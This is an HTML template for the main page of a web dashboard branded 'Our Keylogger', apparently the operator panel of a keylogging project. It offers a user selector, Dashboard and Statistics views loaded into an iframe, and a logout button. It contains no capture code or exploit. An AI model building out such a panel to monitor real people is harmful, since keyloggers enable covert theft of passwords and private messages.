<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Main Page</title>
    <link rel="icon" type="image/x-icon" href="../static/favicon_io/favicon.ico">
    <link rel="stylesheet" href="../static/home-page.css">
</head>
<body>
    <div class="green-corner">
        <span class="green-text">Our Keylogger</span>
    </div>

    <div class="topbar">
        <button onclick="logoutUser()" class="exit-button">Log out</button>
        <select id="userSelect" class="user-select">
            <option value="">Select a user</option>
        </select>
    </div>
    
    <div class="main-container">
        <div class="sidebar">
            <div class="buttons">
                <button id="dashboard" onclick="loadPage(`{{ url_for('dashboard') }}`)">Dashboard</button>
                <button id="statistics" onclick="loadPage(`{{ url_for('staticstics') }}`)">Statistics</button>
                <button disabled onclick="loadPage('page3.html')">Not Available</button>
            </div>
        </div>

        <div class="content">
            <iframe id="contentFrame" src="{{ url_for('dashboard') }}" style="border: none;"></iframe>
        </div>
    </div>

    <div class="circle"></div>

    <script src="../static/home-page.js"></script>
</body>
</html>